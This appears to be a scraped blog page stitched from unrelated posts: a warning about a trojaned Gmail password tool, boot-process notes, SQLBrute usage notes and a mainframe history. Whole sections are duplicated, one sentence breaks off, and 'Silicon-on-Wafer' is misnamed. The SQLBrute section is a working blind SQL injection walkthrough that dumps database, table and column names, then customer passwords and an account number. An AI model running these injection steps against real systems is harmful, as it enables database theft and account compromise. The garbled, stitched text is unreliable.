I downloaded the file from the link provided by Hacking Truths and did an antivirus scan with ESET NOD32. Immediately, it found a Trojan horse program. Even if your antivirus doesn’t show anything untoward, I wouldn’t recommend connecting to a remote server with a tool like this, anyway. It could easily be a phishing scam. You are leaving yourself open to
Moreover, although there seem to be “clean” versions of this password recovery tool on the net, how can you be sure that it’s not got something that is simply not being detected?
There is another warning to be discussed (not just about ensuring you scan all downloads for viruses, Trojans, and malware before you run them). With GMail Password Recovery, anyone could download and install a program like this on any PC to which they have access. Be warned if you use a shared machine and don’t entirely trust other users. If it actually works someone could use it to crack your GMail password.
Such a tool could be especially important for government agents and spies who seem to have a penchant for leaving laptop computers on public transport, in the UK at least, although they never seem to learn the lesson of encryption so I doubt they use strong passwords as it is.
Operating system concepts
Booting Process
Intoduction
operating system concept
When a computer starts up ( obviously by pressing the power button), the first thing that occurs is it send a signal to motherboard which in turn starts the power supply. After supplying the correct amount of power to each device, it send a signal called "Power OK" to BIOS which resides on motherboard.
Once the BIOS receive the "Power OK" signal, it starts the booting process by first initializing a process called POST (Power On Self Test). POST first check that every device has right amount of power and then it check whether the memory is not corrupted. Then it initialize each devices and finally it gives control to BIOS for further booting.
Now the final process of booting begins. For this the BIOS first find 512 bytes of image called MBR (Master Boot Record) or Bootsector from the floppy disk or hard disk which is used for booting. The priority of boot devices is set by the user in BIOS setting. The normal priority is floppy disk first, then hard disk.
Once BIOS finds the bootsector it loads the image in memory and execute it. If a valid bootsector is not found, BIOS check for next drive in boot sequence until it find valid bootsector. If BIOS fails to get valid bootsector, generally it stops the execution and gives an error message "Disk boot failure".
It is bootsectors responsibility to load the operating system in memory and execute it.
Master Boot Record
A device is "bootable" if it carries a boot sector with the byte sequence 0x55, 0xAA in bytes 511 and 512 respectively. When the BIOS finds such a boot sector, it is loaded into memory at a specific location; this is usually 0x0000:0x7c00 (segment 0, address 0x7c00). However, some BIOS' load to 0x7c0:0x0000 (segment 0x07c0, offset 0), which resolves to the same physical address, but can be surprising.
When the wrong CS:IP pair is assumed, absolute near jumps will not work properly, and any code like mov ax,cs; mov ds,ax will result in unexpected variable locations. A good practice is to enforce CS:IP at the very start of your boot sector.
ORG 0x7C00
jmp 0x0000:start
start:
or
ORG 0
jmp 0x07C0:start
start:
On a hard drive, the so-called Master Boot Record (MBR) holds executable code at offset 0x0000 - 0x01bd, followed by table entries for the four primary partitions, using sixteen bytes per entry (0x01be - 0x01fd), and the two-byte signature (0x01fe - 0x01ff).
The layout of the table entries is as follows:
Offset Size (bytes) Description
0x00 1 Boot Indicator (0x80=bootable, 0x00=not bootable)
0x01 1 Starting Head Number
0x02 2 Starting Cylinder Number (10 bits) and Sector (6 bits)
0x04 1 Descriptor (Type of partition/filesystem)
0x05 1 Ending Head Number
0x06 2 Ending Cylinder and Sector numbers
0x08 4 Starting Sector (relative to begining of disk)
0x0C 4 Number of Sectors in partition
Kernel Image
Now we jump two steps ahead and look at where we want to go: Our kernel image. Your boot record would be easiest if it could just copy the kernel image from disk to memory and jump to some given offset. Unfortunately, unless you take extra precautions, your compiler adds all sort of startup code, relocation tables etc. To get a "flat binary" that can be loaded in this simple copy-and-run way, you have to tell GCC:
gcc -c my_kernel.c
ld my_kernel.o -o kernel.bin --oformat=binary -Ttext=0x100000
The -c switch tells GCC to stop right after compilation, i.e. not to link the object file.
The --oformat=binary switch tells the linker you want your output file to be a plain binary image (no startup code, no relocations, ...)
The -Ttext=0x100000 tells the linker you want your "text" (code segment) address to start at the 1mb memory mark. Since you do not link in any relocation tables, the linker has to resolve all references at link time, and has to know where the executable will be loaded to.
You are of course obliged to load your kernel image to the correct offset, or the references the linker did set up will be invalid
computer science concepts
linux tutorial
unix
Intoduction
operating system concept
When a computer starts up ( obviously by pressing the power button), the first thing that occurs is it send a signal to motherboard which in turn starts the power supply. After supplying the correct amount of power to each device, it send a signal called "Power OK" to BIOS which resides on motherboard.
Once the BIOS receive the "Power OK" signal, it starts the booting process by first initializing a process called POST (Power On Self Test). POST first check that every device has right amount of power and then it check whether the memory is not corrupted. Then it initialize each devices and finally it gives control to BIOS for further booting.
Now the final process of booting begins. For this the BIOS first find 512 bytes of image called MBR (Master Boot Record) or Bootsector from the floppy disk or hard disk which is used for booting. The priority of boot devices is set by the user in BIOS setting. The normal priority is floppy disk first, then hard disk.
Once BIOS finds the bootsector it loads the image in memory and execute it. If a valid bootsector is not found, BIOS check for next drive in boot sequence until it find valid bootsector. If BIOS fails to get valid bootsector, generally it stops the execution and gives an error message "Disk boot failure".
It is bootsectors responsibility to load the operating system in memory and execute it.
Master Boot Record
A device is "bootable" if it carries a boot sector with the byte sequence 0x55, 0xAA in bytes 511 and 512 respectively. When the BIOS finds such a boot sector, it is loaded into memory at a specific location; this is usually 0x0000:0x7c00 (segment 0, address 0x7c00). However, some BIOS' load to 0x7c0:0x0000 (segment 0x07c0, offset 0), which resolves to the same physical address, but can be surprising.
When the wrong CS:IP pair is assumed, absolute near jumps will not work properly, and any code like mov ax,cs; mov ds,ax will result in unexpected variable locations. A good practice is to enforce CS:IP at the very start of your boot sector.
ORG 0x7C00
jmp 0x0000:start
start:
or
ORG 0
jmp 0x07C0:start
start:
On a hard drive, the so-called Master Boot Record (MBR) holds executable code at offset 0x0000 - 0x01bd, followed by table entries for the four primary partitions, using sixteen bytes per entry (0x01be - 0x01fd), and the two-byte signature (0x01fe - 0x01ff).
The layout of the table entries is as follows:
Offset Size (bytes) Description
0x00 1 Boot Indicator (0x80=bootable, 0x00=not bootable)
0x01 1 Starting Head Number
0x02 2 Starting Cylinder Number (10 bits) and Sector (6 bits)
0x04 1 Descriptor (Type of partition/filesystem)
0x05 1 Ending Head Number
0x06 2 Ending Cylinder and Sector numbers
0x08 4 Starting Sector (relative to begining of disk)
0x0C 4 Number of Sectors in partition
Kernel Image
Now we jump two steps ahead and look at where we want to go: Our kernel image. Your boot record would be easiest if it could just copy the kernel image from disk to memory and jump to some given offset. Unfortunately, unless you take extra precautions, your compiler adds all sort of startup code, relocation tables etc. To get a "flat binary" that can be loaded in this simple copy-and-run way, you have to tell GCC:
gcc -c my_kernel.c
ld my_kernel.o -o kernel.bin --oformat=binary -Ttext=0x100000
The -c switch tells GCC to stop right after compilation, i.e. not to link the object file.
The --oformat=binary switch tells the linker you want your output file to be a plain binary image (no startup code, no relocations, ...)
The -Ttext=0x100000 tells the linker you want your "text" (code segment) address to start at the 1mb memory mark. Since you do not link in any relocation tables, the linker has to resolve all references at link time, and has to know where the executable will be loaded to.
You are of course obliged to load your kernel image to the correct offset, or the references the linker did set up will be invalid
computer science concepts
linux tutorial
unix
SQL bruit theory
Update - An update to SQLBrute (version 1.0) has been released (including a Windows binary version). This is probably going to be the final version in Python - I've started rewriting the tool as a Windows GUI application in .NET, so look forward to a point-and-brute-force version soon.
Since SQLBrute has been linked to from the Oedipus Web Scanner as a possible exploit tool, I thought I might write some basic usage notes for it... especially since the tool is not at all idiot proof...as evidenced by the fact that I sometimes have trouble running it.
COMPUTER SCIENCE THE COMPLETE REFERENCE
SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn't require non-standard libraries (there is some code in there for pycurl, but it is disabled because it isn't finished).
For error based SQL injection, SQLBrute should work, if you can either:
* Get an identifiable difference between adding the exploit strings AND 1=1 and AND 1=2 to your SQL injection point (usually works if the query is normally valid)
* Get an identifiable difference between adding the exploit strings OR 1=1 and OR 1=2 to your SQL injection point (usually works if the query is normally invalid)
For time based SQL injection, SQLBrute should work if you can use exploit syntax similar to ;waitfor delay '0:0:5' to generate a time delay in Microsoft SQL Server.
Here is the options printed from SQLBrute when you run it with no options:
SQL command line options
___ _____ __ ____ ____ __ __ ____ ____
/ __)( _ )( ) ( _ \( _ \( )( )(_ _)( ___)
\__ \ )(_)( )(__ ) _ < ) / )(__)( )( )__)
(___/(___/\\(____)(____/(_)\_)(______) (__) (____)
Usage: ./sqlbrute.py options url
[--help|-h]
[--verbose|-v]
[--server|-d oracle|sqlserver]
[--error|-e regex]
[--threads|-s number]
[--cookie|-k string]
[--time|-n]
[--data|-p string]
[--database|-f database]
[--table|-t table]
[--column|-c column]
[--where|-w column=data]
[--header|-x header::val]
The only required command line option is the URL. If the vulnerable parameter is on the URL (i.e. in the querystring), that parameter needs to be on the end of the URL and in a format that SQL can be added on the end (i.e. param=foo' is sufficient in a lot of cases).
If the vulnerable parameter is in the POST data, you need to specify a --data option (see below), and have the vulnerable parameter at the end (as for a URL parameter, including a single quote or whatever is needed for the SQL injection point). The tool assumes that it can terminate the SQL using --, and also assumes that you're not going to be exploiting querystring variables on a POST.
Several of the options are for including required information in the requests to the server. You may need to wrap arguments in double quotes because of spaces and special characters in the data:
* --data allows you to specify POST data for a form post. Takes a string containing all the data as an argument
* --cookie allows you to specify the cookies to be supplied. Takes a string containing all the cookies as an argument
* --header allows you to specify arbitrary HTTP headers to include in the request (e.g. Accepts headers or similar). The header name and value need to be supplied as a single argument of the form header::value
Other options modify the default behaviour of the tool:
* --server forces the tool to use Oracle or SQL Server exploit techniques. This is needed because the tool defaults to SQL Server, and won't intelligently detect that Oracle is in use
* --threads specifies how many worker threads the tool will use to send requests. This defaults to 5, however this should be reduced if you are getting unreliable results (especially when doing time based testing). Setting this too high has a tendency to max the CPU on your machine, and have bad effects on the machine you're testing
* --time forces the tool to use time based testing instead of error based testing
* --verbose turns on verbose output. By default the tool doesn't output anything until it has completely enumerated an entry, which can lead to wondering whether it is actually doing anything. Using verbose once will output preliminary results - allowing you to see that its working. Using verbose twice will output requests and responses to allow debug issues with the tool
* --output allows us to specify an output file for the results. Otherwise the only results we will get will be to stdout
The remainder of the options specify the data to be brute forced from the database:
* --error specifies a regular expression to look for that appears in one of the AND or OR cases noted above. Usually this will be something identifiable such as an error message, or a message noting that no results were found
* --database (SQL Server only) specifies what database to use for enumerating data
* --table specifies what table to use for enumerating data
* --column specifies what column to use for enumerating data
* --where allows us to filter what data to brute force out by specifying a WHERE clause when enumerating a column. The where data must be in the form column_name=data (i.e. WHERE foo=bar)
The tool is designed to be used in a logical progression:
* Running the tool without specifying a database, table, or column parameter will enumerate the list of databases for SQL Server, and the list of user tables for Oracle
* Running the tool with the name of a database (SQL Server only) will enumerate the list of tables
* Running the tool with a table parameter (plus database parameter for SQL Server) will enumerate the columns in that table
* Running the tool with a column parameter (with table and database parameters if applicable) will enumerate the data in that column of that parameter. You can then find matching values in other columns of the table through using a --where command line option
And here is an example of enumeration from beginning to end on a sample application to see how this all works. In this example there is a SQL injection error in this ASP/SQL Server application on the locator.asp page. This is exploited through a POST, and the vulnerable parameter is the county parameter:
Enumerating databases
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: msdb
Found: pubs
Found: model
Found: tempdb
Found: master
Found: webapp
Enumerating tables
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp \
http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: myview
Found: locator
Found: customer
Found: postings
Found: responses
Found: dtproperties
Found: fresh_postings
Found: fresh_responses
Enumerating columns
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: city
Found: email
Found: lname
Found: fname
Found: mname
Found: phone
Found: endbal
Found: county
Found: begbal
Found: address
Found: custnum
Found: deposits
Found: password
Found: postcode
Found: withdrawals
Enumerating passwords
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column password http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: dog
Found: test
Found: hawk
Found: loki
Found: fish
Found: buzz
Enumerating the customer number for a specific password
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column custnum --where password=dog \
http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: 1.036512520000000e+008
Since SQLBrute has been linked to from the Oedipus Web Scanner as a possible exploit tool, I thought I might write some basic usage notes for it... especially since the tool is not at all idiot proof...as evidenced by the fact that I sometimes have trouble running it.
COMPUTER SCIENCE THE COMPLETE REFERENCE
SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn't require non-standard libraries (there is some code in there for pycurl, but it is disabled because it isn't finished).
For error based SQL injection, SQLBrute should work, if you can either:
* Get an identifiable difference between adding the exploit strings AND 1=1 and AND 1=2 to your SQL injection point (usually works if the query is normally valid)
* Get an identifiable difference between adding the exploit strings OR 1=1 and OR 1=2 to your SQL injection point (usually works if the query is normally invalid)
For time based SQL injection, SQLBrute should work if you can use exploit syntax similar to ;waitfor delay '0:0:5' to generate a time delay in Microsoft SQL Server.
Here is the options printed from SQLBrute when you run it with no options:
SQL command line options
___ _____ __ ____ ____ __ __ ____ ____
/ __)( _ )( ) ( _ \( _ \( )( )(_ _)( ___)
\__ \ )(_)( )(__ ) _ < ) / )(__)( )( )__)
(___/(___/\\(____)(____/(_)\_)(______) (__) (____)
Usage: ./sqlbrute.py options url
[--help|-h]
[--verbose|-v]
[--server|-d oracle|sqlserver]
[--error|-e regex]
[--threads|-s number]
[--cookie|-k string]
[--time|-n]
[--data|-p string]
[--database|-f database]
[--table|-t table]
[--column|-c column]
[--where|-w column=data]
[--header|-x header::val]
The only required command line option is the URL. If the vulnerable parameter is on the URL (i.e. in the querystring), that parameter needs to be on the end of the URL and in a format that SQL can be added on the end (i.e. param=foo' is sufficient in a lot of cases).
If the vulnerable parameter is in the POST data, you need to specify a --data option (see below), and have the vulnerable parameter at the end (as for a URL parameter, including a single quote or whatever is needed for the SQL injection point). The tool assumes that it can terminate the SQL using --, and also assumes that you're not going to be exploiting querystring variables on a POST.
Several of the options are for including required information in the requests to the server. You may need to wrap arguments in double quotes because of spaces and special characters in the data:
* --data allows you to specify POST data for a form post. Takes a string containing all the data as an argument
* --cookie allows you to specify the cookies to be supplied. Takes a string containing all the cookies as an argument
* --header allows you to specify arbitrary HTTP headers to include in the request (e.g. Accepts headers or similar). The header name and value need to be supplied as a single argument of the form header::value
Other options modify the default behaviour of the tool:
* --server forces the tool to use Oracle or SQL Server exploit techniques. This is needed because the tool defaults to SQL Server, and won't intelligently detect that Oracle is in use
* --threads specifies how many worker threads the tool will use to send requests. This defaults to 5, however this should be reduced if you are getting unreliable results (especially when doing time based testing). Setting this too high has a tendency to max the CPU on your machine, and have bad effects on the machine you're testing
* --time forces the tool to use time based testing instead of error based testing
* --verbose turns on verbose output. By default the tool doesn't output anything until it has completely enumerated an entry, which can lead to wondering whether it is actually doing anything. Using verbose once will output preliminary results - allowing you to see that its working. Using verbose twice will output requests and responses to allow debug issues with the tool
* --output allows us to specify an output file for the results. Otherwise the only results we will get will be to stdout
The remainder of the options specify the data to be brute forced from the database:
* --error specifies a regular expression to look for that appears in one of the AND or OR cases noted above. Usually this will be something identifiable such as an error message, or a message noting that no results were found
* --database (SQL Server only) specifies what database to use for enumerating data
* --table specifies what table to use for enumerating data
* --column specifies what column to use for enumerating data
* --where allows us to filter what data to brute force out by specifying a WHERE clause when enumerating a column. The where data must be in the form column_name=data (i.e. WHERE foo=bar)
The tool is designed to be used in a logical progression:
* Running the tool without specifying a database, table, or column parameter will enumerate the list of databases for SQL Server, and the list of user tables for Oracle
* Running the tool with the name of a database (SQL Server only) will enumerate the list of tables
* Running the tool with a table parameter (plus database parameter for SQL Server) will enumerate the columns in that table
* Running the tool with a column parameter (with table and database parameters if applicable) will enumerate the data in that column of that parameter. You can then find matching values in other columns of the table through using a --where command line option
And here is an example of enumeration from beginning to end on a sample application to see how this all works. In this example there is a SQL injection error in this ASP/SQL Server application on the locator.asp page. This is exploited through a POST, and the vulnerable parameter is the county parameter:
Enumerating databases
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: msdb
Found: pubs
Found: model
Found: tempdb
Found: master
Found: webapp
Enumerating tables
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp \
http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: myview
Found: locator
Found: customer
Found: postings
Found: responses
Found: dtproperties
Found: fresh_postings
Found: fresh_responses
Enumerating columns
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: city
Found: email
Found: lname
Found: fname
Found: mname
Found: phone
Found: endbal
Found: county
Found: begbal
Found: address
Found: custnum
Found: deposits
Found: password
Found: postcode
Found: withdrawals
Enumerating passwords
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column password http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: dog
Found: test
Found: hawk
Found: loki
Found: fish
Found: buzz
Enumerating the customer number for a specific password
./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column custnum --where password=dog \
http://192.168.182.128/locator.asp
This program will currently exit 60 seconds after the last
response comes in.
Found: 1.036512520000000e+008
Mainframe computer
over the past 20 years, the computer industry has re-invented
itself several times. In the late 1970’s most business in North
America was using a form of mainframe computer architecture
which was created by IBM engineers in the 1960’s and
refined by technology inventors including Honeywell, Burroughs,
Digital Equipment, Hitachi Data Systems, and others. These
systems used simple operating systems to run a single version of an
application to handle mostly accounting applications.
As new technology for chip design was patented, developed for mass
manufacturing, it was packaged in small computers for use by small
business. This provided an explosive opportunity for more people to
become introduced to the benefits of automated accounting, which saved
people time and increased the accuracy of information. During the early
1980’s, the industry thrived with the creation of new business applications
for use in municipal governments, hospitals, classroom education,
building construction, and engineering.
The pace of new technology increased again as the Personal Computer
model was invented by Apple Computers and IBM. With Microsoft software
for Operating Systems, Spreadsheets and Word Processing,
individuals could use a computer for daily information. People in all
walks of life began creating applications to simplify cooking, writing,
homework and any task imaginable.
With the use of 3 different methods of computing: mainframe, distributed
and personal systems, many organizations changed their methods
of business to achieve more efficiencies, growth and profit. This was
also fueled by the business trend to decentralize operations, outsource
processing and empower people to run their own piece of the
organization.
In the late 1980’s, the computer industry created another major advancement
with the introduction of UNIX. The concept was to allow
application developers a common operating system with which to
deliver applications. Using the University of Berkeley kernel, several
manufacturer’s including SUN, Digital, IBM, HP, and SCO packaged
additional support function into this kernel to provide higher levels of
reliability, availability and security. During the 1990’s, this evolved into
common, but unique operating systems that minimized the ability for
applications to become portable across different hardware vendors.
Many would argue that UNIX has failed to deliver the true heterogeneous
model it was intended for. The newest attempt is seen in the
LINUX operating system.
The next major breakthrough in computing has been the development of
the Internet as a delivery mechanism for computing. As we have seen,
the Internet has changed everything, and is evolving rapidly as the main
architecture for global communications.
One of the major impacts of Internet usage has been the massive amount
of information that is being gathered and created, i.e. DNA and Genome
mapping and stored on computers. Industry estimates have stated that
the total amount of information in the world will double every 2-3 years.
The effect of this is being seen in the business world with introductions
of Enterprise Resource Management (ERP), Supply Chain Management
(SCM), Customer Relationship Management (CRM), Business Intelligence
(BI), E-Commerce and many other major applications that are
connecting suppliers and customers together.
The cumulative effect of this explosion of computing demand has
caused business and government organizations to begin thinking about
centralization of information technology. IT managers are struggling
with support, costs are increasing and a general feeling that IT is falling
behind, resulting in potential disasters such as the Year 2000 situation
and more recently, Sept. 11 in New York.
There are several bright spots in the technology sector which are just
now being refined and delivered to the marketplace. These include Copper
Chip Technology, Silicon on Insulator (SOI) and Logical
Partitioning (LPAR). Each of these technologies offers substantial
potential in creating the computing architecture that is required to manage
the demand for computing.
IBM has lead the way with the patents and manufacturing development
of Copper and SOI. In 1997, fulfilling a dream of several decades, IBM
introduced a technology that allows chipmakers to use copper wires,
rather than the traditional aluminum interconnects, to link transistors in
chips.
Every chip has a base layer of transistors, with layers of wiring stacked
above to connect the transistors to each other and, ultimately, to the rest
of the computer. The transistors as the first level of a chip are a complex
construction of silicon, metal, and impurities precisely located to
create the millions of minuscule on-or-off switches that make up the
brains of a microprocessor. Aluminum has long been the conductor of
choice, but it will soon reach technological and physical limits of existing
technology. Pushing electrons through smaller and smaller conduits
becomes harder to do – aluminum just isn’t fast enough for these new,
smaller sizes.
Scientists had seen this problem coming for years and tried to find a
way to replace aluminum with the three metals that conduct electricity
better: copper, silver, or gold. Of course, if that was simple, it would
have been done a long time ago. None of those metals is as easy to
work with as aluminum in decreasing amounts. Any new material presents
fresh challenges, and reliably filling submicron channels is a bit
like filling the holes of a golf course from an airplane.
IBM had to develop a diffusion barrier that could buffer silicon wafers
along with the copper. The company has now announced the first commercially
viable implementation of Silicon-on-Wafer (SOI) and the
ability to apply it in building fully functional microprocessors. SOI
refers to the process of implanting oxygen into a silicon wafer to create
an insulating layer and using an annealing process until a thin layer of
SOI is formed. The transistors are then built on top of this thin layer.
SOI technology improves performance over bulk CMOS by 25-35%. It
also brings power usage advantages of 1.7 to 3 times, creates higher
performance and reliability per processor.
computer engineers
itself several times. In the late 1970’s most business in North
America was using a form of mainframe computer architecture
which was created by IBM engineers in the 1960’s and
refined by technology inventors including Honeywell, Burroughs,
Digital Equipment, Hitachi Data Systems, and others. These
systems used simple operating systems to run a single version of an
application to handle mostly accounting applications.
As new technology for chip design was patented, developed for mass
manufacturing, it was packaged in small computers for use by small
business. This provided an explosive opportunity for more people to
become introduced to the benefits of automated accounting, which saved
people time and increased the accuracy of information. During the early
1980’s, the industry thrived with the creation of new business applications
for use in municipal governments, hospitals, classroom education,
building construction, and engineering.
The pace of new technology increased again as the Personal Computer
model was invented by Apple Computers and IBM. With Microsoft software
for Operating Systems, Spreadsheets and Word Processing,
individuals could use a computer for daily information. People in all
walks of life began creating applications to simplify cooking, writing,
homework and any task imaginable.
With the use of 3 different methods of computing: mainframe, distributed
and personal systems, many organizations changed their methods
of business to achieve more efficiencies, growth and profit. This was
also fueled by the business trend to decentralize operations, outsource
processing and empower people to run their own piece of the
organization.
In the late 1980’s, the computer industry created another major advancement
with the introduction of UNIX. The concept was to allow
application developers a common operating system with which to
deliver applications. Using the University of Berkeley kernel, several
manufacturer’s including SUN, Digital, IBM, HP, and SCO packaged
additional support function into this kernel to provide higher levels of
reliability, availability and security. During the 1990’s, this evolved into
common, but unique operating systems that minimized the ability for
applications to become portable across different hardware vendors.
Many would argue that UNIX has failed to deliver the true heterogeneous
model it was intended for. The newest attempt is seen in the
LINUX operating system.
The next major breakthrough in computing has been the development of
the Internet as a delivery mechanism for computing. As we have seen,
the Internet has changed everything, and is evolving rapidly as the main
architecture for global communications.
One of the major impacts of Internet usage has been the massive amount
of information that is being gathered and created, i.e. DNA and Genome
mapping and stored on computers. Industry estimates have stated that
the total amount of information in the world will double every 2-3 years.
The effect of this is being seen in the business world with introductions
of Enterprise Resource Management (ERP), Supply Chain Management
(SCM), Customer Relationship Management (CRM), Business Intelligence
(BI), E-Commerce and many other major applications that are
connecting suppliers and customers together.
The cumulative effect of this explosion of computing demand has
caused business and government organizations to begin thinking about
centralization of information technology. IT managers are struggling
with support, costs are increasing and a general feeling that IT is falling
behind, resulting in potential disasters such as the Year 2000 situation
and more recently, Sept. 11 in New York.
There are several bright spots in the technology sector which are just
now being refined and delivered to the marketplace. These include Copper
Chip Technology, Silicon on Insulator (SOI) and Logical
Partitioning (LPAR). Each of these technologies offers substantial
potential in creating the computing architecture that is required to manage
the demand for computing.
IBM has lead the way with the patents and manufacturing development
of Copper and SOI. In 1997, fulfilling a dream of several decades, IBM
introduced a technology that allows chipmakers to use copper wires,
rather than the traditional aluminum interconnects, to link transistors in
chips.
Every chip has a base layer of transistors, with layers of wiring stacked
above to connect the transistors to each other and, ultimately, to the rest
of the computer. The transistors as the first level of a chip are a complex
construction of silicon, metal, and impurities precisely located to
create the millions of minuscule on-or-off switches that make up the
brains of a microprocessor. Aluminum has long been the conductor of
choice, but it will soon reach technological and physical limits of existing
technology. Pushing electrons through smaller and smaller conduits
becomes harder to do – aluminum just isn’t fast enough for these new,
smaller sizes.
Scientists had seen this problem coming for years and tried to find a
way to replace aluminum with the three metals that conduct electricity
better: copper, silver, or gold. Of course, if that was simple, it would
have been done a long time ago. None of those metals is as easy to
work with as aluminum in decreasing amounts. Any new material presents
fresh challenges, and reliably filling submicron channels is a bit
like filling the holes of a golf course from an airplane.
IBM had to develop a diffusion barrier that could buffer silicon wafers
along with the copper. The company has now announced the first commercially
viable implementation of Silicon-on-Wafer (SOI) and the
ability to apply it in building fully functional microprocessors. SOI
refers to the process of implanting oxygen into a silicon wafer to create
an insulating layer and using an annealing process until a thin layer of
SOI is formed. The transistors are then built on top of this thin layer.
SOI technology improves performance over bulk CMOS by 25-35%. It
also brings power usage advantages of 1.7 to 3 times, creates higher
performance and reliability per processor.
computer engineers
Subscribe to:
Posts (Atom)